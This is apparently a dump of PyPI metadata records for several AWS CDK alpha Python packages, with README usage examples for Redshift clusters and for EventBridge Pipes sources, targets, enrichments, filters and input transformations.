```python from aws_cdk.aws_redshift_alpha import Login import aws_cdk.aws_ec2 as ec2 import aws_cdk.aws_iam as iam # vpc: ec2.Vpc role = iam.Role(self, "Role", assumed_by=iam.ServicePrincipal("redshift.amazonaws.com") ) cluster = Cluster(self, "Redshift", master_user=Login( master_username="admin" ), vpc=vpc ) cluster.add_iam_role(role) ``` ## Multi-AZ Amazon Redshift supports [multiple Availability Zones (Multi-AZ) deployments](https://docs.aws.amazon.com/redshift/latest/mgmt/managing-cluster-multi-az.html) for provisioned RA3 clusters. By using Multi-AZ deployments, your Amazon Redshift data warehouse can continue operating in failure scenarios when an unexpected event happens in an Availability Zone. To create a Multi-AZ cluster, set the `multiAz` property to `true` when creating the cluster. ```python # Example automatically generated from non-compiling source. May contain errors. # vpc: ec2.IVpc redshift.Cluster(stack, "Cluster", master_user={ "master_username": "admin" }, vpc=vpc, # 3 AZs are required for Multi-AZ node_type=redshift.NodeType.RA3_XLPLUS, # must be RA3 node type cluster_type=redshift.ClusterType.MULTI_NODE, # must be MULTI_NODE number_of_nodes=2, # must be 2 or more multi_az=True ) ``` ## Resizing As your data warehousing needs change, it's possible to resize your Redshift cluster. If the cluster was deployed via CDK, it's important to resize it via CDK so the change is registered in the AWS CloudFormation template. There are two types of resize operations: * Elastic resize - Number of nodes and node type can be changed, but not at the same time. Elastic resize is the default behavior, as it's a fast operation and typically completes in minutes.
Elastic resize is only supported on clusters of the following types: * dc1.large (if your cluster is in a VPC) * dc1.8xlarge (if your cluster is in a VPC) * dc2.large * dc2.8xlarge * ds2.xlarge * ds2.8xlarge * ra3.large * ra3.xlplus * ra3.4xlarge * ra3.16xlarge * Classic resize - Number of nodes, node type, or both, can be changed. This operation takes longer to complete, but is useful when the resize operation doesn't meet the criteria of an elastic resize. If you prefer classic resizing, you can set the `classicResizing` flag when creating the cluster. There are other constraints to be aware of, for example, elastic resizing does not support single-node clusters and there are limits on the number of nodes you can add to a cluster. See the [AWS Redshift Documentation](https://docs.aws.amazon.com/redshift/latest/mgmt/managing-cluster-operations.html#rs-resize-tutorial) and [AWS API Documentation](https://docs.aws.amazon.com/redshift/latest/APIReference/API_ResizeCluster.html) for more details. ## Maintenance track name When Amazon Redshift releases a new cluster version, your cluster is updated during its maintenance window. You can control whether your cluster is updated to the most recent approved release or to the previous release. See the [AWS Redshift Documentation](https://docs.aws.amazon.com/redshift/latest/mgmt/managing-cluster-considerations.html#rs-mgmt-maintenance-tracks) for more details. To control which cluster version is applied during a maintenance window, set the `maintenanceTrackName` property for the cluster. ```python # Example automatically generated from non-compiling source. May contain errors. redshift.Cluster(stack, "Cluster", master_user={ "master_username": "admin" }, vpc=vpc, maintenance_track_name=redshift.MaintenanceTrackName.CURRENT ) ``` You can specify one of the following `MaintenanceTrackName` values: * `CURRENT`: Use the most current approved cluster version. * `TRAILING`: Use the cluster version before the current version.
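The elastic-vs-classic criteria described in the resizing section can be made explicit with a small predicate. This is an illustrative sketch only, not part of the CDK or Redshift API; the real eligibility check is performed by the Redshift service and includes further limits (such as caps on node-count growth, and the VPC requirement for dc1 node types).

```python
# Illustrative sketch (not the CDK or Redshift API): encodes the
# elastic-resize criteria described above as an explicit predicate.
ELASTIC_NODE_TYPES = {
    "dc1.large", "dc1.8xlarge",
    "dc2.large", "dc2.8xlarge",
    "ds2.xlarge", "ds2.8xlarge",
    "ra3.large", "ra3.xlplus", "ra3.4xlarge", "ra3.16xlarge",
}

def can_elastic_resize(old_type: str, new_type: str, old_nodes: int, new_nodes: int) -> bool:
    """Return True if the requested change qualifies for an elastic resize."""
    if old_nodes == 1:
        return False  # elastic resize does not support single-node clusters
    if old_type != new_type and old_nodes != new_nodes:
        return False  # node type and node count cannot change in one operation
    # both node types must belong to the supported families listed above
    return old_type in ELASTIC_NODE_TYPES and new_type in ELASTIC_NODE_TYPES
```

If a change fails this kind of check, a classic resize (the `classicResizing` flag) is the fallback.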
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:16.787789
aws_cdk_aws_redshift_alpha-2.239.0a0.tar.gz
222,203
07/76/0990f86720813d283cb39b7447b535d831633d8238c2ac5baa4f7d7b63a1/aws_cdk_aws_redshift_alpha-2.239.0a0.tar.gz
source
sdist
null
false
11839702f92cbb0dac878755a768af28
1ad2f0109106dc29c3acb68cc68c274e890cb652011b5b667253f2a1e26e3b9e
07760990f86720813d283cb39b7447b535d831633d8238c2ac5baa4f7d7b63a1
null
[]
0
2.1
aws-cdk.aws-pipes-targets-alpha
2.239.0a0
The CDK Construct Library for Amazon EventBridge Pipes Targets
# Amazon EventBridge Pipes Targets Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> EventBridge Pipes Targets let you create a target for an EventBridge Pipe. For more details see the [service documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-target.html). ## Targets Pipe targets are the end point of an EventBridge Pipe. The following targets are supported: * `targets.ApiDestinationTarget`: [Send event source to an EventBridge API destination](#amazon-eventbridge-api-destination) * `targets.ApiGatewayTarget`: [Send event source to an API Gateway REST API](#amazon-api-gateway-rest-api) * `targets.CloudWatchLogsTarget`: [Send event source to a CloudWatch Logs log group](#amazon-cloudwatch-logs-log-group) * `targets.EventBridgeTarget`: [Send event source to an EventBridge event bus](#amazon-eventbridge-event-bus) * `targets.FirehoseTarget`: [Send event source to an Amazon Data Firehose delivery stream](#amazon-data-firehose-delivery-stream) * `targets.KinesisTarget`: [Send event source to a Kinesis data stream](#amazon-kinesis-data-stream) * `targets.LambdaFunction`: [Send event source to a Lambda function](#aws-lambda-function) * `targets.SageMakerTarget`: [Send event source to a SageMaker pipeline](#amazon-sagemaker-pipeline) * `targets.SfnStateMachine`: [Invoke a Step Functions state machine from an event 
source](#aws-step-functions-state-machine) * `targets.SnsTarget`: [Send event source to an SNS topic](#amazon-sns-topic) * `targets.SqsTarget`: [Send event source to an SQS queue](#amazon-sqs-queue) ### Amazon EventBridge API Destination An EventBridge API destination can be used as a target for a pipe. The API destination will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # dest: events.ApiDestination api_target = targets.ApiDestinationTarget(dest) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=api_target ) ``` The input to the target API destination can be transformed: ```python # source_queue: sqs.Queue # dest: events.ApiDestination api_target = targets.ApiDestinationTarget(dest, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=api_target ) ``` ### Amazon API Gateway REST API A REST API can be used as a target for a pipe. The REST API will receive the (enriched/filtered) source payload.
```python # source_queue: sqs.Queue fn = lambda_.Function(self, "MyFunc", handler="index.handler", runtime=lambda_.Runtime.NODEJS_LATEST, code=lambda_.Code.from_inline("exports.handler = e => {}") ) rest_api = api.LambdaRestApi(self, "MyRestAPI", handler=fn) api_target = targets.ApiGatewayTarget(rest_api) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=api_target ) ``` The input to the target REST API can be transformed: ```python # source_queue: sqs.Queue fn = lambda_.Function(self, "MyFunc", handler="index.handler", runtime=lambda_.Runtime.NODEJS_LATEST, code=lambda_.Code.from_inline("exports.handler = e => {}") ) rest_api = api.LambdaRestApi(self, "MyRestAPI", handler=fn) api_target = targets.ApiGatewayTarget(rest_api, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=api_target ) ``` ### Amazon CloudWatch Logs Log Group A CloudWatch Logs log group can be used as a target for a pipe. The log group will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_log_group: logs.LogGroup log_group_target = targets.CloudWatchLogsTarget(target_log_group) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=log_group_target ) ``` The input to the target log group can be transformed: ```python # source_queue: sqs.Queue # target_log_group: logs.LogGroup log_group_target = targets.CloudWatchLogsTarget(target_log_group, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=log_group_target ) ``` ### Amazon EventBridge Event Bus An EventBridge event bus can be used as a target for a pipe. The event bus will receive the (enriched/filtered) source payload. 
```python # source_queue: sqs.Queue # target_event_bus: events.EventBus event_bus_target = targets.EventBridgeTarget(target_event_bus) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=event_bus_target ) ``` The input to the target event bus can be transformed: ```python # source_queue: sqs.Queue # target_event_bus: events.EventBus event_bus_target = targets.EventBridgeTarget(target_event_bus, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=event_bus_target ) ``` ### Amazon Data Firehose Delivery Stream An Amazon Data Firehose delivery stream can be used as a target for a pipe. The delivery stream will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_delivery_stream: firehose.DeliveryStream delivery_stream_target = targets.FirehoseTarget(target_delivery_stream) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=delivery_stream_target ) ``` The input to the target delivery stream can be transformed: ```python # source_queue: sqs.Queue # target_delivery_stream: firehose.DeliveryStream delivery_stream_target = targets.FirehoseTarget(target_delivery_stream, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=delivery_stream_target ) ``` ### Amazon Kinesis Data Stream A Kinesis data stream can be used as a target for a pipe. The data stream will receive the (enriched/filtered) source payload. 
```python # source_queue: sqs.Queue # target_stream: kinesis.Stream stream_target = targets.KinesisTarget(target_stream, partition_key="pk" ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=stream_target ) ``` The input to the target data stream can be transformed: ```python # source_queue: sqs.Queue # target_stream: kinesis.Stream stream_target = targets.KinesisTarget(target_stream, partition_key="pk", input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=stream_target ) ``` ### AWS Lambda Function A Lambda function can be used as a target for a pipe. The Lambda function will be invoked with the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_function: lambda.IFunction pipe_target = targets.LambdaFunction(target_function) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The target Lambda function is invoked synchronously by default. You can also choose to invoke the Lambda function asynchronously by setting the `invocationType` property to `FIRE_AND_FORGET`. ```python # source_queue: sqs.Queue # target_function: lambda.IFunction pipe_target = targets.LambdaFunction(target_function, invocation_type=targets.LambdaFunctionInvocationType.FIRE_AND_FORGET ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The input to the target Lambda function can be transformed: ```python # source_queue: sqs.Queue # target_function: lambda.IFunction pipe_target = targets.LambdaFunction(target_function, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` ### Amazon SageMaker Pipeline A SageMaker pipeline can be used as a target for a pipe. The pipeline will receive the (enriched/filtered) source payload.
```python # source_queue: sqs.Queue # target_pipeline: sagemaker.IPipeline pipeline_target = targets.SageMakerTarget(target_pipeline) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipeline_target ) ``` The input to the target pipeline can be transformed: ```python # source_queue: sqs.Queue # target_pipeline: sagemaker.IPipeline pipeline_target = targets.SageMakerTarget(target_pipeline, input_transformation=pipes.InputTransformation.from_object({"body": "👀"}) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipeline_target ) ``` ### AWS Step Functions State Machine A Step Functions state machine can be used as a target for a pipe. The state machine will be invoked with the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_state_machine: sfn.IStateMachine pipe_target = targets.SfnStateMachine(target_state_machine) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` You can specify the invocation type when the target state machine is invoked: ```python # source_queue: sqs.Queue # target_state_machine: sfn.IStateMachine pipe_target = targets.SfnStateMachine(target_state_machine, invocation_type=targets.StateMachineInvocationType.FIRE_AND_FORGET ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The input to the target state machine can be transformed: ```python # source_queue: sqs.Queue # target_state_machine: sfn.IStateMachine pipe_target = targets.SfnStateMachine(target_state_machine, input_transformation=pipes.InputTransformation.from_object({"body": "<$.body>"}), invocation_type=targets.StateMachineInvocationType.FIRE_AND_FORGET ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` ### Amazon SNS Topic An SNS topic can be used as a target for a pipe. The topic will receive the (enriched/filtered) source payload. 
```python # source_queue: sqs.Queue # target_topic: sns.Topic pipe_target = targets.SnsTarget(target_topic) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The target input can be transformed: ```python # source_queue: sqs.Queue # target_topic: sns.Topic pipe_target = targets.SnsTarget(target_topic, input_transformation=pipes.InputTransformation.from_object({ "SomeKey": pipes.DynamicInput.from_event_path("$.body") }) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` ### Amazon SQS Queue An SQS queue can be used as a target for a pipe. The queue will receive the (enriched/filtered) source payload. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe_target = targets.SqsTarget(target_queue) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ``` The target input can be transformed: ```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe_target = targets.SqsTarget(target_queue, input_transformation=pipes.InputTransformation.from_object({ "SomeKey": pipes.DynamicInput.from_event_path("$.body") }) ) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=pipe_target ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-pipes-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:16.062005
aws_cdk_aws_pipes_targets_alpha-2.239.0a0.tar.gz
90,594
b7/a6/4b9dc939ba18860216bdd350c2423b9ccdb0c06a08bf8ca39a67ba518bcd/aws_cdk_aws_pipes_targets_alpha-2.239.0a0.tar.gz
source
sdist
null
false
8e3d6b3af89ea94045d4edf3f1d79ae1
d5d6c5b443d04bce745ffbec22548731582596cc97b55668782a7e4897e0ae56
b7a64b9dc939ba18860216bdd350c2423b9ccdb0c06a08bf8ca39a67ba518bcd
null
[]
0
2.1
aws-cdk.aws-pipes-sources-alpha
2.239.0a0
The CDK Construct Library for Amazon EventBridge Pipes Sources
# Amazon EventBridge Pipes Sources Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> EventBridge Pipes Sources let you create a source for an EventBridge Pipe. For more details see the [service documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-source.html). ## Pipe sources Pipe sources are the starting point of an EventBridge Pipe. They are the source of the events that are sent to the pipe. ### Amazon SQS An SQS message queue can be used as a source for a pipe. The queue will be polled for new messages and the messages will be sent to the pipe. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe_source = sources.SqsSource(source_queue) pipe = pipes.Pipe(self, "Pipe", source=pipe_source, target=SqsTarget(target_queue) ) ``` The polling configuration can be customized: ```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe_source = sources.SqsSource(source_queue, batch_size=10, maximum_batching_window=cdk.Duration.seconds(10) ) pipe = pipes.Pipe(self, "Pipe", source=pipe_source, target=SqsTarget(target_queue) ) ``` ### Amazon Kinesis A Kinesis stream can be used as a source for a pipe. The stream will be polled for new messages and the messages will be sent to the pipe.
```python # source_stream: kinesis.Stream # target_queue: sqs.Queue pipe_source = sources.KinesisSource(source_stream, starting_position=sources.KinesisStartingPosition.LATEST ) pipe = pipes.Pipe(self, "Pipe", source=pipe_source, target=SqsTarget(target_queue) ) ``` ### Amazon DynamoDB A DynamoDB stream can be used as a source for a pipe. The stream will be polled for new messages and the messages will be sent to the pipe. ```python # target_queue: sqs.Queue table = ddb.TableV2(self, "MyTable", partition_key=ddb.Attribute( name="id", type=ddb.AttributeType.STRING ), dynamo_stream=ddb.StreamViewType.NEW_IMAGE ) pipe_source = sources.DynamoDBSource(table, starting_position=sources.DynamoDBStartingPosition.LATEST ) pipe = pipes.Pipe(self, "Pipe", source=pipe_source, target=SqsTarget(target_queue) ) ```
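The interaction of `batchSize` and `maximumBatchingWindow` shown for the SQS source above can be modelled in plain Python. This is an illustrative simplification, not the Pipes polling implementation (which flushes on a timer rather than on message arrival); `flush_points` is a hypothetical helper.

```python
# Illustrative model of batchSize / maximumBatchingWindow: a batch is
# released as soon as either the size limit is reached or the window has
# elapsed since the first buffered message.
def flush_points(arrival_times, batch_size, window_seconds):
    """Return the indices at which a batch would be flushed, given sorted
    message arrival times in seconds."""
    flushes = []
    start = 0        # index of the first message in the current batch
    first_at = None  # arrival time of that first message
    for i, t in enumerate(arrival_times):
        if first_at is None:
            first_at = t
        if (i - start + 1) >= batch_size or (t - first_at) >= window_seconds:
            flushes.append(i)
            start, first_at = i + 1, None
    return flushes
```

With `batch_size=10` and a 10-second window, a trickle of messages is still delivered at most 10 seconds after the first one arrives.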
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-pipes-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:15.319879
aws_cdk_aws_pipes_sources_alpha-2.239.0a0.tar.gz
65,281
09/2b/fab9004d1ebf733223ec9c4bd2fbcfd0c77c9d0cb9c09e7a5da4ce9a7755/aws_cdk_aws_pipes_sources_alpha-2.239.0a0.tar.gz
source
sdist
null
false
52e009f32492279aa3bfea2dae2046ec
96bb31d3f6ecb0d1e927b238e16ebba06e0c87350006ba1e69f09ed7bd82e6e3
092bfab9004d1ebf733223ec9c4bd2fbcfd0c77c9d0cb9c09e7a5da4ce9a7755
null
[]
0
2.1
aws-cdk.aws-pipes-enrichments-alpha
2.239.0a0
The CDK Construct Library for Amazon EventBridge Pipes Enrichments
# Amazon EventBridge Pipes Enrichments Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> EventBridge Pipes Enrichments let you create enrichments for an EventBridge Pipe. For more details see the [service documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/pipes-enrichment.html). ## Pipe enrichments Pipe enrichments are invoked prior to sending the events to a target of an EventBridge Pipe. ### Lambda function A Lambda function can be used to enrich events of a pipe. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # enrichment_function: lambda.Function enrichment = enrichments.LambdaEnrichment(enrichment_function) pipe = pipes.Pipe(self, "Pipe", source=SomeSource(source_queue), enrichment=enrichment, target=SomeTarget(target_queue) ) ``` ### Step Functions state machine A Step Functions state machine can be used to enrich events of a pipe. **Note:** EventBridge Pipes only supports Express workflows invoked synchronously. > Visit [Amazon EventBridge Pipes event enrichment](https://docs.aws.amazon.com/eventbridge/latest/userguide/pipes-enrichment.html) for more details.
```python # source_queue: sqs.Queue # target_queue: sqs.Queue # enrichment_state_machine: stepfunctions.StateMachine enrichment = enrichments.StepFunctionsEnrichment(enrichment_state_machine) pipe = pipes.Pipe(self, "Pipe", source=SomeSource(source_queue), enrichment=enrichment, target=SomeTarget(target_queue) ) ``` ### API destination An API destination can be used to enrich events of a pipe. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # api_destination: events.ApiDestination enrichment = enrichments.ApiDestinationEnrichment(api_destination) pipe = pipes.Pipe(self, "Pipe", source=SomeSource(source_queue), enrichment=enrichment, target=SomeTarget(target_queue) ) ``` ### API Gateway (REST API) An API Gateway REST API can be used to enrich events of a pipe. Pipes only supports API Gateway REST APIs. HTTP APIs are not supported. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue # rest_api: apigateway.RestApi enrichment = enrichments.ApiGatewayEnrichment(rest_api) pipe = pipes.Pipe(self, "Pipe", source=SomeSource(source_queue), enrichment=enrichment, target=SomeTarget(target_queue) ) ```
text/markdown
Amazon Web Services
null
null
null
Apache-2.0
null
[ "Intended Audience :: Developers", "Operating System :: OS Independent", "Programming Language :: JavaScript", "Programming Language :: Python :: 3 :: Only", "Programming Language :: Python :: 3.9", "Programming Language :: Python :: 3.10", "Programming Language :: Python :: 3.11", "Typing :: Typed", ...
[]
https://github.com/aws/aws-cdk
null
~=3.9
[]
[]
[]
[ "aws-cdk-lib<3.0.0,>=2.239.0", "aws-cdk.aws-pipes-alpha==2.239.0.a0", "constructs<11.0.0,>=10.5.0", "jsii<2.0.0,>=1.126.0", "publication>=0.0.3", "typeguard==2.13.3" ]
[]
[]
[]
[ "Source, https://github.com/aws/aws-cdk.git" ]
twine/6.2.0 CPython/3.11.14
2026-02-19T21:58:14.580526
aws_cdk_aws_pipes_enrichments_alpha-2.239.0a0.tar.gz
55,756
a8/0f/10634c5eff46e9bca3bc14623b2a059ff2afb63b02eaf7965b162d972f9d/aws_cdk_aws_pipes_enrichments_alpha-2.239.0a0.tar.gz
source
sdist
null
false
c6c81e517f25787c2b47fe3c1afda348
c94050daca0dee02214851b97f46ee281687c4738631f03bfc8f4fdda14d9d3b
a80f10634c5eff46e9bca3bc14623b2a059ff2afb63b02eaf7965b162d972f9d
null
[]
0
2.1
aws-cdk.aws-pipes-alpha
2.239.0a0
The CDK Construct Library for Amazon EventBridge Pipes
# Amazon EventBridge Pipes Construct Library <!--BEGIN STABILITY BANNER-->--- ![cdk-constructs: Experimental](https://img.shields.io/badge/cdk--constructs-experimental-important.svg?style=for-the-badge) > The APIs of higher level constructs in this module are experimental and under active development. > They are subject to non-backward compatible changes or removal in any future version. These are > not subject to the [Semantic Versioning](https://semver.org/) model and breaking changes will be > announced in the release notes. This means that while you may use them, you may need to update > your source code when upgrading to a newer version of this package. --- <!--END STABILITY BANNER--> EventBridge Pipes let you create source to target connections between several AWS services. While transporting messages from a source to a target the messages can be filtered, transformed and enriched. ![diagram of pipes](https://d1.awsstatic.com/product-marketing/EventBridge/Product-Page-Diagram_Amazon-EventBridge-Pipes.cd7961854be4432d63f6158ffd18271d6c9fa3ec.png) For more details see the [service documentation](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes.html). ## Pipe [EventBridge Pipes](https://aws.amazon.com/blogs/aws/new-create-point-to-point-integrations-between-event-producers-and-consumers-with-amazon-eventbridge-pipes/) is a fully managed service that enables point-to-point integrations between event producers and consumers. Pipes can be used to connect several AWS services to each other, or to connect AWS services to external services. A pipe has a source and a target. The source events can be filtered and enriched before reaching the target. ## Example - pipe usage > The following code examples use an example implementation of a [source](#source) and [target](#target). To define a pipe you need to create a new `Pipe` construct. The `Pipe` construct needs a source and a target. 
```python # source_queue: sqs.Queue # target_queue: sqs.Queue pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue) ) ``` This minimal example creates a pipe with an SQS queue as source and an SQS queue as target. Messages from the source are put into the body of the target message. ## Source A source is an AWS service that is polled. The following sources are possible: * [Amazon DynamoDB stream](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-dynamodb.html) * [Amazon Kinesis stream](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-kinesis.html) * [Amazon MQ broker](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-mq.html) * [Amazon MSK stream](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-msk.html) * [Amazon SQS queue](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-sqs.html) * [Apache Kafka stream](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-kafka.html) Currently, DynamoDB, Kinesis, and SQS are supported. If you are interested in support for additional sources, kindly let us know by opening a GitHub issue or raising a PR. ### Example source ```python # source_queue: sqs.Queue pipe_source = SqsSource(source_queue) ``` ## Filter A filter can be used to filter the events from the source before they are forwarded to the enrichment or, if no enrichment is present, the target step. Multiple filter expressions are possible. If one of the filter expressions matches, the event is forwarded to the enrichment or target step.
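The OR semantics of multiple filter expressions can be illustrated with a minimal matcher in plain Python. This is a sketch only, not the EventBridge filtering engine, which supports many more pattern operators (prefix, numeric, exists, anything-but, and so on).

```python
# Minimal matcher sketching how multiple filter patterns are OR-ed:
# an event passes if at least one pattern matches it.
def matches(patterns, event):
    """Return True if the event matches at least one pattern."""
    def match_one(pattern, value):
        if isinstance(pattern, dict):
            # every key in the pattern must be present and match recursively
            return isinstance(value, dict) and all(
                k in value and match_one(v, value[k]) for k, v in pattern.items()
            )
        # a leaf pattern is a list of allowed literal values
        return value in pattern
    return any(match_one(p, event) for p in patterns)
```

An event with `customerType` equal to `"B2B"` matches the pattern `{"body": {"customerType": ["B2B", "B2C"]}}`, while any other value is dropped.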
### Example - filter usage ```python # source_queue: sqs.Queue # target_queue: sqs.Queue source_filter = pipes.Filter([ pipes.FilterPattern.from_object({ "body": { # only forward events with customerType B2B or B2C "customer_type": ["B2B", "B2C"] } }) ]) pipe = pipes.Pipe(self, "Pipe", source=SqsSource(source_queue), target=SqsTarget(target_queue), filter=source_filter ) ``` This example shows a filter that only forwards events with the `customerType` B2B or B2C from the source messages. Messages that do not match the filter are not forwarded to the enrichment or target step. You can define multiple filter patterns, which are combined with a logical `OR`. Additional filter patterns and details can be found in the EventBridge pipes [docs](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-event-filtering.html). ## Input transformation For enrichments and targets the input event can be transformed. The transformation is applied for each item of the batch. A transformation has access to the input event as well as to some context information of the pipe itself, like the name of the pipe. See [docs](https://docs.aws.amazon.com/eventbridge/latest/userguide/eb-pipes-input-transformation.html) for details. ### Example - input transformation from object The input transformation can be created from an object. The object can contain static values, dynamic values or pipe variables. ```python # source_queue: sqs.Queue # target_queue: sqs.Queue target_input_transformation = pipes.InputTransformation.from_object({ "static_field": "static value", "dynamic_field": pipes.DynamicInput.from_event_path("$.body.payload"), "pipe_variable": pipes.DynamicInput.pipe_name }) pipe = pipes.Pipe(self, "Pipe", pipe_name="MyPipe", source=SqsSource(source_queue), target=SqsTarget(target_queue, input_transformation=target_input_transformation ) ) ``` This example shows a transformation that adds a static field, a dynamic field and a pipe variable to the input event.
